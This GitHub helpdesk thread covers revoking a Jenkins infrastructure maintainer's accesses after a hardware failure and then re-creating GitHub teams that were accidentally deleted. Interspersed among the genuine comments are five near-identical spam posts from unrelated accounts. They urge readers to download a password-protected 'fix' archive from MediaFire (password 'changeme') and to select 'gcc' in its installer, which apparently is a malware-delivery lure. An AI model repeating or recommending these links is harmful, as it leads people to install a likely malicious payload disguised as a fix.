### ISSUE TITLE
Cleanup after accidents in Revoke accesses for Herve (temporary)

### ISSUE THREAD

**Issue by dduportal** [jenkins-infra/helpdesk#4264]
@lemeurherve has a (Jenkins) computer harddrive issue which need repair.

As he own a few privileged accesses to Jenkins Infra assets, we'll revoke his accesses until his machine is fixed, his keys (SSH/GPG) are regenerated and his accounts (LDAP, GitHub) are retrieved with new passwords.

Revokation tasks:

- [x] accounts/keycloak/LDAP: remove Herve's Jenkins user from any LDAP admin  group
- [x] VPN revoke Herve's VPN access 
- [x] revoke VM SSH accesses
- [x] GitHub access: remove Herve from the usual admin groups
- [x] Secrets: re-encrypt Sops secrets without his GPG key (and remove the current GPG key)
- [x] Azure: remove Herve account

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dduportal** [comment]
Update: removed from GitHub organization `jenkins-infra` teams.

**Comment by dduportal** [comment]
Update: accounts/LDAP

- In order to block accounts without deleting it:
  - Set up a non existing email
  - Reset password (to rotate former one)
- Removed the account from the LDAP groups `admin` and `jenkins-admin` (in keycloak)

**Comment by dduportal** [comment]
All accesses revoked \o/ (see associated commits)

**Comment by timja** [comment]
Was it intended to delete a bunch of teams? E.g azure ci-maintainers

**Comment by dduportal** [comment]
> Was it intended to delete a bunch of teams? E.g azure ci-maintainers

Some were intended (but unrelated to this issue: summer cleanup)
- Evergreen related

But it looks like deleting Herve had the side effect to delete the teams he created :|
- azure
- ci-maintainers
- kubernetes
- terraform
- monitoring
- packer-maintainers

(I just checked my emails)


=> I wonder how much did we use these team (I think only `ci-maintainers` could have been)

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by timja** [comment]
Yeah I think that’s the main one and then probably some CODEOWNERS

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by mayank785** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by timja** [comment]
Reopened due to https://github.com/jenkins-infra/pipeline-library/pull/893#issuecomment-2548351277 not being addressed

**Comment by dduportal** [comment]
> > Reopened due to [#4264 (comment)](https://github.com/jenkins-infra/helpdesk/issues/4264#issuecomment-2310463885) not being addressed, see [jenkins-infra/pipeline-library#893 (comment)](https://github.com/jenkins-infra/pipeline-library/pull/893#issuecomment-2548351277)
> 
> ack: opened [jenkins-infra/pipeline-library#894](https://github.com/jenkins-infra/pipeline-library/pull/894) for the fix in pipeline-library.
> 
> Next step: search ofr other occurences

I'm closing this PR and instead I've re-created the team `ci-maintainers` (aka @jenkins-infra/ci-maintainers ) with the following members (tying to map members, by memory) + added Valentin:

<img width="1543" alt="Capture d’écran 2024-12-18 à 09 10 02" src="https://github.com/user-attachments/assets/6207343c-775e-4a96-a3b8-9f2a5f258c71" />

=> if you are a member of this team and want to be removed, or if you need to be added, please comment here or add an issue in the helpdesk (preferred).


This team now has the write access to the pipeline-library repository, and the codeowner file is now valid:

<img width="1543" alt="Capture d’écran 2024-12-18 à 09 10 59" src="https://github.com/user-attachments/assets/a1aedca3-2b8b-4d0c-87c0-46921df8385d" />

**Comment by dduportal** [comment]
@timja is it ok for you?

**Comment by timja** [comment]
Perfect thank you

**Comment by jonesbusy** [comment]
Thanks! Fine for me
